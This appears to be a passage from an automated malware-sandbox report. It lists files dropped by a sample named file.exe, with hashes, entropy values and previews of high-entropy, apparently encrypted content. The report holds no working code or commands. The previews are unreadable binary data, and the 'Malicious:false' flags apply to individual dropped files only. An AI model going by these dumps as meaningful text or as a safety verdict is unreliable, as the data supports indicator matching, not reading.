          Preview:<?xml..\A..|.g.;..n...Z...g|..R_Y2cZ^..9. ,-.......V..UL.<.gb...J.@.......B...R..m,..m......WIw/#...+lK..1..2k76...s..t.R....#.3,....<(k{....K..".G...@Q.q.{...I...g.....E....).T...""..C....i?.S3.5.C.Tj#.;...f.7".C....\.OL..+Fw|.....mo. ./..Ul..T.M.[]..R.Z..h"..=.....*.$e..oN.}...f.%y.&....m.N%....).Q.=..$s....tV.2.OS.|...."W......"1.>N-*H.F......W$..'..0>b.5.......JE..VB.$.m......@..U.-.6. O.<.]n..?.....v.8..T<.....=H...G.56..4...>WH......L...dJ..2.S..l........j..4.B...l.x..p.....-j.........8"..i/?..C.#e5.....sn;`;.....1.....8'....1.).r..8...;?....7. ..z.;..!.FI...m%I..|..... ..u*..l.r!..~..S..~...:....T...7...k..../.B..A..H..Q....,:....c.M3.!.%V..4..dRn.$.p....Q.-Xl.#..|..8=O|u.T..w....c..n.{..n.s.z...#g.st9...%...{...-..%W9...+...sq....w.....x.q.!....W.3.y]..."..@Y.^.D.J=.D........0..glp..{XG....W.'.;..v.(....}...7.V....qz,.H.g.O..J0x.#q..GQ.%.^...H.8.I.../ru.c...A..z.5.T.}....4Ci..;...j.C.Z.N...lv.m.....ci.l......lyn}.o].a..j9k.||CT
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1088
          Entropy (8bit):7.817008272953195
          Encrypted:false
          SSDEEP:24:jk5AwOfOcAIbTz4vgPb4BRQhQEy4bV1CzEwxdVK6l6Ye6J4LiTkbD:4zCOcAIbTYbq64Z1CzEwxdVK60YeReiD
          MD5:4E3DFB030B276CD5953EDA30FBB65C0D
          SHA1:69B9FD016D919F9E014D7188065418827AA2CB73
          SHA-256:7501D1A7F7168914498B83DC31511E57F4D001793D69970966FC00635846C050
          SHA-512:B85456B9FEAFF0FEADA29E73170606D08BB725E7AD3153FB01CF265D119326B59B06B37FF27E120F3AB0FDA3F94541C3FBEC8AB92218D985BEE946AE64F2A82C
          Malicious:false
          Preview:<?xml..'(.)..:OC.|c...2..u.....%........i..b.3..E.V..A:.v.%.W..y+..f..J&.={M.c.>.gj..".....:/_x..~Y.....}7F.C|.T...`....._.7.....Q+....D{.&.%....g...GSb..^ ?....d|Q.C.7..F.&).........B..Dx...gp.d$.......S.......W...]....v.....Q......A..U.....6=W.ie.|w.-5r.k.......2$...D..........o.S..8.]u.rRe!..g........'4{;O..'.x..2NW.7..L..vglK...9.a.J_.."..0i...O..*..mL..Y.K.<.d..z..\54........Q-..//...$.....u.O..<Iq>.=.=.T,.'.....xc...O.Dp.G4.y..H... ...E...>9...'c.p0.3..... ..."..[c..........%...]..o8.....w........H...@P...g.J`\...T.g.].U.B...8b.T....i.........u71...A..a..LN%...N..g!.oY.w.u4.@.f...a..q....b^?..I..m..d...?....g..U....qm.^i<..x...Lx....6.7...P..g...`.r......l.4....P.E.U]......*Md.av.n"-..s.{o.....zc.U.1M.....-../..U..[..._T....x.J.1..U....4.=....A.....%.U+.SI..n.&..^..].a{}X..k ....u.hU.........$_.1v.........2.c5T...a.;+...)..V.....n>V.$8H....@..Q.=(.mz...S7%...U...H.t.F.......~}Wx...4...v............k.7vR.....mt.I.v.-]`k)..yR..e..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1100
          Entropy (8bit):7.798620387343792
          Encrypted:false
          SSDEEP:24:HzTJk5VgOg9YFv48DWgWpynCaYHZhn+CheRQ4wptcesv7BiTkbD:TagGhRDWgWRNDh9ptce9iD
          MD5:7C5E47249A3C8D9CE7F8346C427D1344
          SHA1:4B0767A4E34AF540FC161A9B6DF3C5A1935AA6DB
          SHA-256:E58F6091E2B776A5F9256BCACE9A48C20D39C8BCAAA6FEC084A3DBD291ED08CE
          SHA-512:47FB89343AB11D2B3220D99234261EBEE6D639DB2FEA7A39D3D9FC8C0BDEE8458E95E48F28C5DA9BC73F33B2171FAFA7D1B8834EEB62A19321907DCF8289C858
          Malicious:false
          Preview:<?xml...R......L5F..S....E......O.....t....5.Z.Z.Q?|.t...*.o.s.....F../Vj..U.4..4w..Z......*a..t>L.C.... ......b.z.....}..RcN.Z.z^...5.gO>..C .........#.$...6......SR..i..;.-......baQ...S,..!......%...?.\..'.\0..a.fq....,A.c.*.D..I.:5.d|.b....p..P..r6.sUa....^.....t)....!.....&....[../....c..F.....-W.....J..z.......\....^.S.#,UN.|- ..-$H6..."|.f.c.._I.......C...D.y.C9......<:&....H]i...e...q..34.|...[...y..`,..^.|....A.v..I.\.u)...r.u...:....SX..a.......~.3..S.....Q8.L.<o.cFQ...t..$.....p76p...M..,..Oa.&1....9.Ht.ml...M...D`Ucv..L...6<....a6...f.t.ad.\......<..qzm..l.1..suTIE....p.`.....T.....yk.9SO....U8..R!..(h......j./x.w......Z ..........A.,.=R....E.......Z.0.......N6[>.6.w..&$..:7....#C..e]N...H..%..HwALj.....{x....!1Rq...[w8.Bt4.v..:..&..S2.....n..b...H}....*|.9L.].Q...<..d4.e{....=E.6.Cvg.FG.M....<G..C5^..\.6.e.....5..#<.~.IG0.ZU......iv[.@%B..m..J.j-.u...+.....a'...(B}.Ep'.].."...H&Y.#.._..*...<$X.s...a.<w..t.....s.&.7
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1192
          Entropy (8bit):7.831069584739721
          Encrypted:false
          SSDEEP:24:/aSQ+tZROVHOdtfFHy+pqqYcX8TuL3GRVkLU4y+ziTkbD:/VQ+LRwO7sqYDTc3LU4PGiD
          MD5:49EB448A12F26F2C1EF54D9D3AE9FD03
          SHA1:C1EC9EAB247A50389B3ED6E94F424A4ED2FDE0A5
          SHA-256:E9353CC68EFB33D7E53296FB47BBB8923D8EF17534F908C692BAA30AF39C7E26
          SHA-512:C3194FFBF1451112FE53C1CD7160918552004E1E5ED0544D4FFBA00A2EADCA8B474DC9DBBCABB216BB5699BFD862DF849B8E5DC8D47D03CD77D433EC5988B1A1
          Malicious:false
          Preview:<?xmlTA......O..:&..B....-z#j....7..z....q.;T7y~.D..<#zC.h...Y.*V...k...x.IM0Ev.....~.C....Bb_KP...~.m@k......z.).1.&.zJ..%e*.(2.}..jl....5:o...,^....d..s..rRP.)......&.N&.....yH.:.x..W.$uO....U....(......\...3.......O\..[V2=J4..o]V.cz[0@.l.:...e.......gq...K.r.\.` .T.?.c...N.....a.s.BaRE...b..1..E..M..-S.R...b.C.....i.eH.!.]..!..W........c0.C"(,$7.3.1<.g.$u..)..c..^@T#[N.?e.r.Dz..t.1yj....*..j...S.>i.)..O.S.+..._.h........dn.;..C/F..4 e...i.........~..$.=....Z.....B8...N7.!.Ju...J.|...............(...>.".x....b....^.......F...W>...SL..HW.[.....=...>.\_J+....]5..>.y..J....G.aJ.Vu.............6...9=.,.....1.#...jo......."...u0<O2p..S.........M.]6.g.|.e..U....l}1..p..W.(...^..L..r.....m..7.. ....{o.X.h(.ZF....7..|.....6#L.8"...-...l..z..d ..!....;Q-).j.BD.=}*...~h.GQ.n..hG..o..K...c.96.5i.-J....^L.i.M.....g2..'..........Q.....B..E]p.u.../*.;X.[?..xH..p"...Q......!O.5.Kz...j..E.b.N.....F..awI...z.>fEZE.....2PF|p...Ym..D.J.8.t...%.H`..;g..*
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1031
          Entropy (8bit):7.788960863916275
          Encrypted:false
          SSDEEP:24:1YrlhtJOKwVGubK0nkCC0p4EOKtHwWXPw5iTkbD:aljAKwVdbK2NnPniD
          MD5:51FB7DA1CEA1EE488675D2479531BB2E
          SHA1:00E1EE6C19F24891B23B247F35D882D7A771BD39
          SHA-256:00B301CB55D2F93BFB895C6E6122DBBE6CC8562ECFE5179BC48813ED0AA87766
          SHA-512:AFFF3D908EA767C53D1E4CBF2DA62F1B571ABB37F84AE5A291215816F258FE2695946E3B3EA69DF4B8591B9D95954A36313DA340187CFB53EB04887F481CB79D
          Malicious:false
          Preview:<?xml.`..62..z.&M.y..#k.9V...]. ....,n.*Cx....T.6.....`U..U.=.i.?.{...A.V.R...A...G.........f.1...Vo...A."....GT8..~j...g..s...x.xH........!./....*)w..E.g..4..r..b$vy4z.w.......j...+,..o....}."t...kb....!.\R..KEut...%s$:...C.^u..."....|.......h../.5.Ym....>o..~..f..EC%OL*>..+|.\...t...+Va..i... ......,:.Ge.n.o@...i.....K.YBw.P.4TfX..2..../..7xwMV.....@....Z....=7..r...{.:....F....%..Tk...N..?.(t..."(z.N.......W.gi.kW.rt...P..M...$...[bn...m^.,..[...or.......ZU>b.g...A.q....=....E..n..65.ad...c.g....q..!.02F.8..)...[....t...>i=.=.a5.y.T.0..b[.2./.:G..,....7....+z.^.....j0.R.R..2...^.9........L.|..L.j..wG.O.a....,......s....Y.2..D../.....L..D"z.?....._..c..b....|...w..51..S..L.SF=~.*& .b..:..(f..........5V$..3.%..4p........3".....8)3....}{...5..._'X...........}.B.4...$9...b.J..|.w...........j.I.`?..G.{..^...P.qk.A..M.H..X.~?..^..d{d...l.._.b...+i/ .xGss.}.....n4.!...$...zj..@..r..I...n...2.l..&..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3884
          Entropy (8bit):7.943965708939814
          Encrypted:false
          SSDEEP:96:2V7USGoeANr87ANRzzTNCdBqFnhBs9vyNFV6ID:2V7USGoMAN9zTNC6BhBspy7p
          MD5:5E47739DF9F664765237D0577924E4EA
          SHA1:0AD1016B017F97F5F30E47A3840E3A1D96FCF838
          SHA-256:9FE8315F4736640821FA1F0EF0FB7F1903AB002ABF6D4D45D3B0BCDFB94EF23C
          SHA-512:37EE115BD82D2F7C956181D2E99B0289EA875362D0C650723591CE7E893FB8DF40DBD276C5B0B4915B55BFD5A4BCC881C2EF231D9B9DC5D0C07E2D7DF03C7001
          Malicious:false
          Preview:<?xmlS......Z...I..y...~.....<..R;._&O...k..z.7....k.A.Y.r......%....q."..e.h\.. )..s...,y;.`......=....XUj_^nG.M(.......\.#..C.r.......t.....`'.}....P$..bm..~..x..8C..v.3.R.p...K0wG...=J..E(......7=.w).._.<..X3~h.}...m;..4s.C.=.....F."..]w<..j;.s...?.$.{.E....h.W.P%6.._...<.BDQ.j.D"./<..N;....n.=..>..rR....t..wl.h......`S..'..\{...P*>6..........=.p.6.H.|...^?.\.$....Z.j_..s.U.".b.8Ds..{...P{X.4.w..]zT]..%.xD..Z5[.%......E{Cu.\}U.......|...uH...../..h..E.G..5..3m....l.u.W..I.U...A1.@.e...$.T.W5g+%`c....7....i....d..A$."..C...BB.M5~\x.g....j.\..B..EA..........-4. ....1].Qm;.~@.^....~....:z.].p.gy.=.?..A+.|.Ny.....t.l... k. ..|.@cv..)X..C.......zjH..2.....q.]_mk..UUH.>.4.8J..b.3j..8k&.J...w..c..Xo.46..'....h..A._.F...pC......X...ZM...{1D....+O.:I."...Z.|.-..&..G.t..7<....?!..Y.......LRF....G.9...+....R.......D#..Z.#.Mb..z..uD.rN-..xt......_..O....6.....tLn?......f..F..........2.d}'E.....vP...=.W.X.w.-.F.{..F8..._..7.&.k"*..r
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):790
          Entropy (8bit):7.703867797824908
          Encrypted:false
          SSDEEP:12:8idg0399fZhjoBkC9eBPTBXZkbN79jFFV/LgJZVnEOTxLEc1tc6uJvbLVKorXOtm:zdHt5ZisFT8bLnV87tFYiDazqt2iTkbD
          MD5:BB0E543ED7E7514E60132CF113B42980
          SHA1:F0AFCFEC4B9C6D500600C6B35D9D8EA9951F772C
          SHA-256:BE617FDD83B337BF007EA85A6EF0F6AF231F07BC82E021AE2A5452F686AFFE20
          SHA-512:A1831AF8EC8A0F21803401AEFF33B1E9C9C5C22D6AD64A34D6E834052D2431A354409A460FFBF5831F95285A73D59CBCA75118CC9698307580B7EBC047750A6F
          Malicious:false
          Preview:<?xml.,=.......w..Jx#k#n..6.;.A.A\.......e^.)O5..F....,p...#w:3....Bq.*A.H>.W....~..5....6F.'.H.O.u.>~.k.yz....33..Y..w.3N.....l..(.>..2...>.L...m.@.."&.......yP...$..m,`AP...@P....=....Dg.%7.(5.[..4J,....}F.#..q.8...g<O..;..rJ^....N.....F.<.c6..?..+..m.e...=....B.....1/.hApX..O......R?....E..EV.5.J.....O.uYO.)#(..L.t..../._w..........Y/Q>|c.... ..;.L...4...Q...w...5...%.d....{|.X...;t.sz..c..Y...8.D..Q.E..p.0......b...~.;...+.rg.u.....>.v:u..9Q.RZ..6.].~.4f.3...=...@u..6....Z#!k&.........1VK.{.Pd....g.....p<.&.(.;;6j...j..G.....B..^C.KX.|}R...6...7........f.-W<.%...Sl.s.......sE.$...J..1l...z.@{.M.....V...../;-...=`D...<E.b...]f...f../4.M....I-.!.K.4.w0.Q@..v..3..^...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3934
          Entropy (8bit):7.950346499890705
          Encrypted:false
          SSDEEP:48:/jX6+IPDMvF0H5LJAiRwnr5KEGVQ5/1FLWM2KdS6dVLxDpsERspkyZauwSk6iD:/zIMKL3Cr4rU3iM2K7VlDp2Uvdd
          MD5:35AE398928E607C8B758ED22194E73A8
          SHA1:84DD83A22B344581F4C3D8B9BD805E51391DD327
          SHA-256:007DF95543273E32B3E9A9F33C7CD0985AED4BE1E6A01674F11F958A774E02E9
          SHA-512:5FEF75740808F8196F1981CFC05DECCEE0427D5300AF17D5EFA5936CCE28F9A3057C1B9E72D49D18C17E21F44874A3DCB68E312C34276987431C638FEF996BAA
          Malicious:false
          Preview:<?xmlo-..r.^z.50%.X.......J...E..2..%K....2....6. .7.U....Q|....]...(../..].H0...Q.....U..D..=z.[.......3...'+.;...Vn.M..c....-..,.......K0_.X......}........K..4.[.'..g~.np....7^\..Er.|k_.PS.CsEc.E.n......I....l..mu{....q.?..z.W....u..cD.'.....z...cD0..3.K.S....N.&:s.........M|}.0..A.)]..U.q...CU.F.1.....r...:.p.........C....dg).....).$...m....qNQ..Y..Q..d.....+....^..#.R......V......U`...;..F...I.:.{C.U0.~=(Hx..@l.??.p.b..%g..1...w..p..4......-.CJ..m...R|...U.ts..c0.. .@......Z....T5e>>iJ.N}..a.i0-.....9.chA...:....c...2u..amul.5.'.^..t.z.D..r..H.-..z.wm...86.,a.g.@...2..&.....mkRfE$.t....xn..&J.....*...I........3Z.KW>..._g.....yn....R..C..1X~M...(.&G..]..1.....8.C. ..yP,r.7.p.QU....da..y.QsY.$...gG..R.r..fO..,...c.=j3.Q.6.........F..|u+#...F....C..s.G..}.PkYcM...W.J.J!.......AnO..%....>eX.....&.8.Gn.. .;.-+.Zl...&E.P..E....]...A.kcVT%..$..ab...&..iB_=....0.!..@..%.*.5.....?....*..^..V.J..n.z`.....$q.....%.bY..'.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1148
          Entropy (8bit):7.820667357131173
          Encrypted:false
          SSDEEP:24:0YThIC4ogvMIPFFyWWxa9s8YKVWm/iKuY3OwboGjvIDz/iTkbD:0YTh3tgvNPFIWi8YKggZNjoGjvIaiD
          MD5:AB001412E086682A8C48764A3A7B7044
          SHA1:AFB199D26A610138DD5355788A09078C8A41BFF1
          SHA-256:46DDB1C61F9A9A08AF1D1B489F95984E103616252F2095E22D92C6F2587F8DEB
          SHA-512:746FBA4E5B933B64398D84B9953F202822BB6F993604DC05C51C546BA5F6CC9CBA3FFCBE4BE75CF1B55870F46B137526E8A56D9723FC92FB33A4D0E35923064D
          Malicious:false
          Preview:<?xml9=...g......?]..J7....3.t./%.4.`q*..rc_:..e`&.H..mk.x<.#.yk..._."T.....1.u.E...,.....i....t......6y.....iX.....B....$~...8..D..:......#.c...T.....J.7*..9wdm..E.$.b..a.#...~.....r...S.'.)^.O.`.4.%..XB.zx....o.xac...u..`....&..........=^...m...".....|.2...m....U ........~..n..C..! ..O.h3...$&...qb....lt..aR.h...._...6?..Q.9...;l4..?P..KP.?...jl.....AjT..@.!.U..$>i......*..n.B.*.Yc)..........W~.m...L..0~.{.....w.rOON.p.M.....A.xw.!.I|.....hN..`Q.......r.^.......m.J........#...k...L..Z?#.[.`..s|.K...O..y...5.t.z.6.S<`...t?.1..!K:y7.(.-.....#G9...r.....m.U.%...7..!..1...<^.p....k.3.=.I...I.1.6..<.y.X..F..MF.r..B\..z...j\.af..(...x...d.X.....frP.7#...<#.N....t!...Fg....5}....S..s'.t...C...%...z<i.......k....,R.!.G.=....$p....[4.R.]r...)q.........L.....G..>X..{..._...a...#.......*M8......_..Lp..h}t.2o.\...ui.."y..t.'........7......:..II.C..&...9.7.T.sN....I.}...S..F.e...C....-.s.3xL..=.@..~..mc...z4^.fS7.zcwN.v;!qM.6..;.}.$...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1782
          Entropy (8bit):7.894075426827293
          Encrypted:false
          SSDEEP:48:9vJK4XVnS2lUkOASVYKgp7/IL7jVVR6biD:9vg4lS0wYbIL7jVl
          MD5:67D0E3554E28C79B28DF46F6166AD8B9
          SHA1:7A3F02DC103AA7FDD727403E8704AFBD91E67063
          SHA-256:D45AB4AD9D2D12A80E598FDAEEAF70D381789541C09108E7CC5CF1CE41D54620
          SHA-512:0F6C857D096C0E100FAC950945B6410FBE774544066EC7E1F14ECD094D9B77E7D0360801795EF4AA62EF638A5EC5D7A673C46E29C2C7973680C1B3290DEAE196
          Malicious:false
          Preview:<?xml.....B.f......>^..t.G.*T....dT..(.H.P&"...>...;..F6x....73/..K..H?...)..]..../l%2..V..zA]`u..........S.O......T.y.5..gU^.....=0.........-U.$P.Ki.}u.k.rNe.{W.s...K.v......g....@.T2.=.......o....N.._....k)g....,.wG....<.....p.N.d.:R.N..B.....)*A.rm..bC.._u.7I..;.sE.#DI\.=.5./.......C..F..Ts.o.x=G....0L..kq.\.w...\."^.....`.@2{....t.X..`k....~.|.u....$'..../..5.@.....L%...&.&|N8....)....xuA..:.d..F.Axr..`..{.2lv.....BZ..........n.P7*W..a7...g..K..}+.v..G..vO^i.y.8...Y..1b....=..>...4].m8.v.:T.9....C=..q~l......)..gSdUJ..0Q.E.c7D...h.....?.....k7:...;.V. ..8......R......G.N..H...2...x.....>,Y.:O..U.+.._|..R.4.{.~..y..D..P>i.V..ytMm.A."|M>...n...]e.m..V6UQ|..t.k...]...QvK1..F..4......v....aE..u.Y*s.h.3..b*..i.Vj...ZB.EQ..d..%.K=..1..F.T./..Y..Zd........x9<....[U..o....h.t.=..{.%.2.1R.k....nB.+?..........%w.C.....)............A.....xA..664.<Z3 .ir..DPO............,.Qf....(..Nx.}RL.|.2..,.......\i%.....^..,......;....h~K.....-<...."n.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):791
          Entropy (8bit):7.71475069165336
          Encrypted:false
          SSDEEP:24:KFIVIsxdn5ek1Lvi7I+vZGym+3FVwRx2EiTkbD:KmNxF5eiLvijdDwREiD
          MD5:DBC1711D7FB3CE12DC066E4C1B55A98C
          SHA1:5E90A780A4150E1B2B3D3D8BC3C765849CDE0B48
          SHA-256:1B869DE2BEC26AB7D1B299EEE9DD0529009F7654CE586B9540C7AC9178597588
          SHA-512:C022CAB3FAA05EAEB9FC0AD3D72CCF4C5284C27B4316F1D80D3A85833CBB3E58942389913FDE0DD83FA897BB7DD71F3FECFCEBD138701F981C8F89BC6AC2529F
          Malicious:false
          Preview:<?xml.:7$.y/.C.......L.....'.K-.......Y....H.#u.j../....&hf...>...K....z.A...$.`..d....jxl$@!t...h.u._E.p...# !.....E!.v..........~...,..U..O.26.i../T...L,-..h...r=v..&+....(2..2...$X.(..ya.../.o.E:..4:48t..%.r....<,..LANN,...q..}H...m.;..|B...0.s..x=<r.C..X..H.V/)....k....3bFf..3...X,...Wb.M....u.=..)*[..s.&Zs.$....2..0........z[zTa.....6....g.U....-~.....|..IJ..W._.K.J9o.=...-../..j..A..aj*#.z.3.i....i.x,...^..a..R..8......O..8..q......R.5mU.."68.v.jP...^t..I.H.>.[..O'gZc..P..,..I|%..Dw......-..M.cG...1...D..p.'.T;?.I...d...D)k..&'..5c....Y.kW_..6.\..K.].....}.n..3H..8...PN4=x..n.....t..jq..BE-'W:..R...v|.p...l.....H..vOz..[%..<..].j.wB`OM.......F\...w7.'^p.gC....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1082
          Entropy (8bit):7.7728847903100835
          Encrypted:false
          SSDEEP:24:NHXbFTAzJClGVgdyiyRtBL6UNpefYyhU6sT3fAiTkbD:RbFYCltdyRtBeUNwfYyS3TPxiD
          MD5:2A2021DAF066F6012DED563DA598D67E
          SHA1:F21732C379D1E0A24E83BEA0F51E7563372E08AB
          SHA-256:5643D4BF63F2ADB6DCDA1560E0F259CA22237C859ACF6918CD94701E11D48A7C
          SHA-512:F5022DFED8EF40958FE9FCDB98377A496DF05D3C9AD81E4F3B456EF87900A709DDAE14F2FD69556C923611E6346BA7DF789D0EBB2833720762D2E5ACC7FCC4F1
          Malicious:false
          Preview:<?xml.......................X..AD.~:..2 S)q......M.)....yP!.?mt-....v.'t..n.O.*..}TU...'fPI.a-..2..9..ih...z[.....X.X..(..S'a...HgO.......k^>..;..T.`..~.p.d.}.#..B..._.h........^...J.QRL....w(.:uaR.fmw.?.......)2..2~.}.O.....M.6.K5..m...0...`..f....QU....l..........x6....4........#..T.......n-..;....wF.g...."...&....)8.p .[n2..o.1.o,:lHi....MY.......r..............~~<8.E..]...EE.\..R.Zn.K.....m.Xc=..!.jlI..?........J^.;......W..:....T%ViO..'W.....%..E,..dL....0^[.{e...]......2.G..VO..4>......mD4...9.^..*..h..6..F.7V.....;F.@.>.b{G..UX..(.;S.|m....s;..q.r....J...)S../.:.U.......zL..N.Q.C....<....0O....$.._.,a.....4.<..Z..A .?.RL.,i25.4...V...NP./.W......<z....xQ..i....<J.8P....!..D..b+.n.)..hG..[&j.&E.].u<Q..Lt,\.O.V.g"+.?...A....@......(.....dV..q]'.7....q....U:..L.......X..@aST.J..*..7O`..C.....0.zX+T.......\Pbq...R..Z.........V...V..o.....o..8p.......kS..3QO.............OM.....j.Q......x.q.+Ko...j~..............V...b.7.[.0
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1061
          Entropy (8bit):7.800728508088604
          Encrypted:false
          SSDEEP:24:XhkowfxyF0f2PE/fgGbNeALamMC/ej6Hnbop+AomRyc0xdAiTkbD:X7lF0f2woGbNpLamXej6HbsomQz9iD
          MD5:B2FCEE7270DEC0CF13E3CCC793D9F2B5
          SHA1:B06DF9B6C81A7B92B64E21B2ED29DA193F80EC4B
          SHA-256:407958D232962C73A460A56C8B771ABA26B2AC15627E959BB97AAE80B3A28132
          SHA-512:D5F6CCABEF610BEEDE49CF0AD4C5A1CDEDA0D4CD87F312815AD131E0601316BFF92EFD15BFCC0B6CA2A41EE7524AA45A3833859668BB7E46067D5C7173B5DEAD
          Malicious:false
          Preview:<?xmll.{.R}3.Z.....$...W....4.}.xz..R......s....ha.a-........P.<..fh-R...eI.nO....h(*.;CyF...W..=.<e..e..4.......$...$[.02P;...P..E..?U..........'..+..,......F.z..8q.QGT.`.b.OF-.p`.`......~%K...[.q.\|.%.....\f!.b.....%...o.Uz...pg..zqy..sWJ..{...?qa.....LTKW.UQ.L.sS..(.k/k.^...Ca...%.~A1(.k..t.I.j...=,.%+;\)....^...Os.?..{......a.].ZQ.m.N.g..A......8..........}""+.B.m..# U....;.....3..g......+..Z...P.5.@.,sG_....5.Z:?O.[$....s..<.D.<....{.....9z* .l.....B1N...t..| ]D.*...st..5*..m!...F0..P.J.S..y.F/~.}..}.7"J..#5..:.....d...]....W..Q_M.?../.t%.V....E..]../.Q..=.....-h...3.S.: ....~Xe.`.fTG.4d[.>GI...A=S.6.B.Xw&....'e..06..H...#./..p!uZ~.-....?.o.....9 W[.*..R..q-.*.".4..,^Oeh.o..Hu..+b..<...<*..H.i...W.~z.>.}...F.ru...T.N.5v+.p.E.!..._./..S....i.:..mx .9..IM....'.b.ZH.07.....G....W.*._b.oM>....JgKn...N,.....+b..`.].....Q.JE>GJ.[.....F.q...#U....C..Y,y....H.0..O}.D.(...2.Q....F@.5|..Vr...>&..Z.....<...:.O.o...E..m..X.A\#<.u.g.3r6yxl1GT8iG2X6JaJ
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):801
          Entropy (8bit):7.737189645046167
          Encrypted:false
          SSDEEP:24:BmG9Yf89MQFkC6R2XVqZS31zcQQU2VM0lXHiTkbD:BmG9YfCHFkC6R2XcZ2rQo0EiD
          MD5:8C2332864B921FC91E7356AA1B66A107
          SHA1:6536CFC98A8714BEC4F79BD3419430BFBA919219
          SHA-256:873895E08F74EF69689370D2CEB82D8B894FD9BFDC7F9DBBFCD7D7D8B4F6F726
          SHA-512:2DECF28F28668FB6F487B074D6EA5CEA50DD21D2CB7D4ECAF42B59F57C8A4BCA67552042F5749653D15E41A11E5E564EBC83CCDFB7C24E73BCE5E89BEDDB0156
          Malicious:false
          Preview:<?xml..l..z..k.5.t.;+.e%...........h;I.Z...>..t.=.>.~.5.?>.vo?..U.GXa........r(C..qd..WUD.}w.|...)....{....[\/....b=.\D1.B.{9.....*...&.G$Ti...4..Y.'..K..V..b.?......w......F".V4>..........}.4...I.........\...%..A.`..S.PUz.5....;X.&...L5.'S.]...Q9d:...b...Z........,r...y...i...!.0k2......Lb$...ufVk.N.#.X.P*..AW.h...P%.....+7.+......XY.!.=f..j..#.....Z.P.u...U7..B.#...Ub.;..f.9.O.v..x `$.Qs.t.....+..G%......0. ..n.....3?.......5bb.%.u".L.j4..*..h.8A..t@i9.9...8f..c..g.A7I\u....C...F_..~Lq.e<L.....s..k$P.~.......a{"V..5&....q{7.b...p.}u<.X.....6.W_kD..@..]m.|.....#...I.3-i.G....o..d..!oO4uXF.o_.7.7...n>d..Xd./-.u......J..R..U.c4*..Ox.. 3.....^.m...~<8O..m.d..~k...e.....o......f.dz+1..`r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1485
          Entropy (8bit):7.868946148553421
          Encrypted:false
          SSDEEP:24:Ucajg+8anO5EEQVhK67Ha0ktUW1Bl+UtHmoeOpxsyfIJ/TAWUKjQD47n5xakNiTW:UcogLanO9ShZ7H0PHltgoeaSyfIJEWxZ
          MD5:0BFEC0E1B7F25CD93B30D5FC6C19F632
          SHA1:819B8A432ACB018BCA951E2A6890FD86D932A757
          SHA-256:34A2B7615DD27D0166DBD52340224BD9411115A6A8B9DC507926BEF0404B4338
          SHA-512:851B8875F5E019ECA02B63C00FF1E497416FB9DF4415315D305356636349CA262F36127CF0626DD66F17B530E1082E882D57025ABD54B3BE5B44FAB66EBCF310
          Malicious:false
          Preview:<?xmlr.ny...........,.e.. ..A...?...A=..c.!...i........c...d....f.N..6..fu.Q.....E..N:_..*,.(A0.t0..Ac.4..@..V.s.7.K..9.-.~.Z$.M..N>>K.>yc._.Hh.,.Z&.......4D.e;...i;6..b6.].s.s]j..Q...u.$v.&..{.}q.Q.O.#..Q.f...>..p.....\s.......s3t)..F]..#.T.z..Lu..\....G.e.<uY.. 4......T#....G}9^....x.ml...q[..E.ND\..&W{6..?......(.H...r....(...l....du,....l.\L...La.......r.o.....9S2..N.Y.-.Y..]?;....._..(z..e.?K.8.pR....\i....M>...A..qr9......f.."S;.......|1&..an.....-E...Y|"....~.O.i.~.q....%...VM.U.!._.b....a..!FW.'...Io.t.V...h.E..m%......@|^,.@F......[K.xQ...*B$.-......&.SF..~[z...D.....{[Q1....O..|...\.[7$......e.#D....}.....|UtJ$.%"....).$...!........UDP....1..y:.d...%.[..Sfb.s...'...X..kV8.2P..Z.7J...(."8..yF..89.\....*...;eX.C*..B..Y........K.`f..%~d.'.OZ-........'..ib....2...U..\.KDS.A.RFx.m..."..o.)Xam't...o.&.......&.c.y.H..>T".......X@.A.J..h..j...).h.&"!..b.....{.{W.}...+Du..l.T.....y..........]r....y.9..CI..R........HkL..rf...].d$
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1340
          Entropy (8bit):7.852160763811529
          Encrypted:false
          SSDEEP:24:f76dH1WrIu6+TQd4l9sIemH64ndYhyhXW+GUfTiT8KQE84gTiTkbD:D6PsIugd4PsIFHvdYh83GUfkQEAmiD
          MD5:CBE0459FB8307D1F3F49D3F8D6F524AC
          SHA1:EAE2FD9E5AE46A47B4106D0679D5AE2DF71B7020
          SHA-256:3D532DB54D1B3E16CDA41745ED88FCD72C5C8B1E88617BA2FAB976FA38415BB8
          SHA-512:3A5B0605B35D92565E955E5730D98D6AEF4E608ED0EE34E933CE130952CA66CDD0894B8EB2423DCE070DCC1D251B347597DC93B8C9858F1CB4B42399B28FC647
          Malicious:false
